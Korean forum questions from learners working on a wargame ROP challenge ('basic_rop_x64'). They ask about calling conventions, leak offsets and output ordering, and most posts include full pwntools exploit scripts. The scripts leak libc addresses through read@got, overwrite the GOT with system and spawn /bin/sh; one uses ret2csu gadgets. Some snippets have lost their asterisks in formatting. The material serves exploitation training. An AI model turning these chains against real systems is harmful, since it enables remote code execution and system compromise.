basic_rop_x64

예제 코드에서 write(0, read@got, 8)을 호출하기 위해서 페이로드에 pop_rdi 0 pop_rsi_r15 read@got 8 이런 순서로 넣고 있는데 r15에 들어가는 값도 호출 규약에 따라 인자로 취급이 되나요 rdi rsi rdx 이런 순서 아니었나요

from pwn import * p = remote("host3.dreamhack.games", 14928) elf = ELF("./basic_rop_x64") libc = ELF("./libc.so.6") read_plt = elf.plt['read'] read_got = elf.got['read'] write_plt = elf.plt['write'] pop_rdi = 0x0000000000400883 pop_rsi_r15 = 0x0000000000400881 ret = 0x00000000004005a9 payload = b'A'0x40 + b'B'0x08 payload += p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(read_got) + p64(0) + p64(write_plt) payload += p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(read_got) + p64(0) + p64(read_plt) payload += p64(pop_rdi) + p64(read_got + 8) + p64(ret) + p64(read_plt) p.send(payload) p.recvuntil(b"A"*0x40) read_leak = u64(p.recv(6) + b'\x00'*2) libc_base = read_leak - libc.symbols['read'] system = libc_base + libc.symbols['system'] print("read: ", hex(read_leak)) print("libc_base: ", hex(libc_base)) print("system: ", hex(system)) p.send(p64(system) + b'/bin/sh\x00') p.interactive() 위 코드에서 read(0, buf, 0x400); 에서 입력은 한 후 payload를 통해 작성한 return address 가 실행 된후 write(1, buf, sizeof(buf));가 실행되는 것이라고 생각했는데 실행해보면 write(1, buf, sizeof(buf));가 먼저 실행됩니다 이유가 뭔가요??

payload를 구성하고 그걸 바탕으로 leak된 read_got 값을 받는 과정에서 이해가 안되는 부분이 있어서 질문드립니다. 분명 buf를 통해 보낼 때는 0x48의 크기만큼 A를 채운 후 payload를 구성하는데 왜 받을 때는 0x40만큼의 A를 받은 후에 leak이 되는 것인지 궁금합니다. 위 사진만 보아도 A의 개수가 달라지는 것을 확인할 수는 있는데 왜 달라지는 것인가요?

동작 자체에 여러 의문점들이 있어서 질문합니다. buf = b'A'*0x48 write(1, read_got, 8) buf += p64(pop_rdi) + p64(1) buf += p64(pop_rsi_r15) + p64(read_got) + p64(8) buf += p64(write_plt) buf += p64(main) #? 와이 위 상황에서 main을 payload 구성 후에 등록하면 ret 값으로 왜 main으로 돌아가는가 main으로 돌아가는 것을 발견했는데 그러면 write는 하는게 없는가? (write가 buf출력인 것 같긴 함) 위 질문이 맞다면 write가 다 끝난 후에 main으로 돌아가는 과정인 것인가? 그럼 write는 어떻게 실행된거고 그 후 main으로 다시 돌아가는건 어떻게 보장되는 것인가 payload = b'A'*0x48 payload += p64(pop_rdi) + p64(binsh) payload += p64(system) p.send(payload) p.recvuntil(b'A'*0x40) 다시 payload를 구성해서 system과 binsh을 보냈을 때 왜 b’A’*0x40까지 받고 난 후에 interactive를 진행하는가? payload 구성 단계 및 동작과정에서 이해가 잘 되지 않아 의문점들을 적어두었던 것을 질문하게 되었습니다! 도와주세요ㅠㅠ

buf = b'A'*0x48 write(1, read_got, 8) buf += p64(pop_rdi) + p64(1) buf += p64(pop_rsi_r15) + p64(read_got) + p64(8) buf += p64(write_plt) buf += p64(main) #? 와이 p.send(buf) p.recvuntil(b'A'*0x40) read = u64(p.recvn(6) + b'\x00'*2) 위를 통해 처음 단계에서 buf 구성에 write_plt를 통해 read_got를 출력하고 read의 주소를 받아오는 과정의 payload를 작성했습니다. 이를 통해 libc_base를 구하고 그 후의 동작을 완성시키는 코드가 더 있는데 위 코드 부분에서 궁금증이 생겼습니다. [질문] buf = b'A'*0x48 을 통해 stack에서 ret 직전까지를 무의미한 dummy값으로 덮고 난 후에 payload를 통해 write를 실행시켰습니다. 그러나 이후 받을 때는 b'A'*0x40 만큼만 받고 난 후에 나오는 값이 바로 read의 주소가 되는 것을 확인하였습니다. 처음 보낼때는 dummy값을 0x48만큼 보냈었는데 왜 다 구성하고 받을 때는 0x40만큼만 받고 난 후에 read_got값이 나오는지 궁금합니다!! 0x8만큼의 dummy값이 어디로 갔는지 모르겠습니다 도와주세요ㅠㅠ

어느부분이 문제인건가요?ㅜㅜㅜ from pwn import * p = remote("host3.dreamhack.games",21490) def slog(name, addr): return success(": ".join([name, hex(addr)])) context.log_level = 'debug' e = ELF("./basic_rop_x64") libc = ELF("libc.so.6") puts_plt=e.plt['puts'] read_plt=e.plt['read'] read_got=e.got['read'] pop_rdi=0x0000000000400883 pop_rsi_pop_r15=0x0000000000400881 payload = b"A"0x40 + b"B"0x8 puts(read_got) payload += p64(pop_rdi) + p64(read_got) payload += p64(puts_plt) read(0, read_got, 0x10) payload += p64(pop_rdi) + p64(0) payload += p64(pop_rsi_pop_r15) + p64(read_got) + p64(0) payload += p64(read_plt) read("/bin/sh") == system("/bin/sh") payload += p64(pop_rdi) payload += p64(read_got+0x8) payload += p64(read_plt) p.send(payload) read = u64(p.recvn(6)+b"\x00"*2) lb = read - libc.symbols["read"] system = lb + libc.symbols["system"] slog("read", read) slog("libc base", lb) slog("system", system) p.send(p64(system)+b"/bin/sh\x00") p.interactive() 그리고 어덯해 익스플로잇 코드를 디버깅 하나요? 어느부분이 문제인지 익스코드 디버킹 하는지 알려주세요

read(0, buf, 0x400); write(1, buf, sizeof(buf)); read_got와 puts_plt를 통해 read의 got를 출력해서 leak 시키는 페이로드를 만들고 버퍼오버플로우를 통해 ret에 저장시키면 출력하면서 가져올 수 있는데요 read의 got값 출력보다 write의 출력이 먼저 수행되는 이유가 궁금합니다

gdb에서 buf 배열에,,값을 세팅 하려면 어떻게 하면 되나요? set $rbp-0x40 = 'A' 하면 안되는 것 같고, $rbp-0x40 주소가 가리키는 곳에 0x48 사이즈 만큼 'A'를 넣으려면 어떻게 하면 되는지요?

from pwn import * context.log_level = 'debug' #p = remote("host3.dreamhack.games", 21826) p = process("./basic_rop_x64") e = ELF("./basic_rop_x64") libc = ELF("./libc.so.6") read_plt = e.plt['read'] read_got = e.got['read'] puts_plt = e.plt['puts'] pop_rdi = 0x0000000000000a73 print(f"read_plt: {hex(read_plt)}") print(f"read_got: {hex(read_got)}") print(f"puts_plt: {hex(puts_plt)}") payload = b'A'0x40 + b'B'0x8 payload += p64(pop_rdi) payload += p64(read_got) payload += p64(puts_plt) p.send(payload) p.recvuntil("A"*0x40) read = u64(p.recvn(6) + b"\x00"*2) 질문 왜 buf(0x40) + sfp(0x8)가 아닌 buf(0x40)을 넘겨야 read 함수 주소인가요?

이문제로 많이 해메고 잇어요 거의 다온거같은데 system 함수가 전달 안되는 거같아요 어떤게 문제죠? ㅜ 작성한 셀코드는 from pwn import* context.log_level = "debug" p = process("./basic_rop_x64") #p =remote("host3.dreamhack.games",20854) #e = ELF("./basic_rop_x64") libc = ELF("./libc.so.6") read_got = 0x601030 bss = 0x601080 write_got = 0x601020 csu_init1 = 0x40087a csu_init2 = 0x400860 payload = b"A" * 0x48 #write(1,write,8) leack got payload +=p64(csu_init1) payload +=p64(0) payload +=p64(1) payload +=p64(write_got) payload +=p64(8) payload +=p64(write_got) payload +=p64(1) payload +=p64(csu_init2) #read(0,bss,binsh) payload +=p64(0) payload +=p64(1) payload +=p64(read_got) payload +=p64(8) payload +=p64(bss) payload +=p64(0) payload +=p64(csu_init2) #write(1,read_got,sytem) payload +=p64(0) payload +=p64(1) payload +=p64(write_got) payload +=p64(8) payload +=p64(read_got) payload +=p64(1) payload +=p64(csu_init2) #system(binsh) payload +=p64(0) payload +=p64(1) payload +=p64(read_got) payload +=p64(0) payload +=p64(0) payload +=p64(bss) payload +=p64(csu_init2) p.sendline(payload) print(p.recvn(0x40)) write_addr = u64(p.recvn(8)) libc_base = write_addr - 0xf72b0 system = libc_base - 0xf72b0 + 0x45390 print('write @ ' + hex(write_addr)) print('system @ ' + hex(system)) p.send('/bin/sh\x00') p.sendline(p64(system)) gdb.attach(p) pause() p.interactive() 이렇캐 됩니당 ㅜㅜ 버전은 20.4